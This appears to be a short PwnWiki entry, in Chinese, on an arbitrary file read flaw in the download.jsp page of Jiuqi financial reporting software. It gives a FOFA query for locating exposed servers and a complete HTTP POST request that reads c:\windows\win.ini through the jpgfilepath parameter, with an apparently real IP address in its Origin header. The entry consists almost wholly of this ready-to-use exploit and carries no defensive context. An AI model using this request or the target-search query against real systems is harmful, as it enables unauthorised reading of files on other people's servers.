久其財務報表 download.jsp 任意文件讀取漏洞
From PwnWiki
FOFA
body="/netrep/"
漏洞利用
發送以下請求:
POST /netrep/ebook/browse/download.jsp HTTP/1.1 Host: Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://114.251.113.53:7002 Content-Type: application/x-www-form-urlencoded jpgfilepath=c:\windows\win.ini
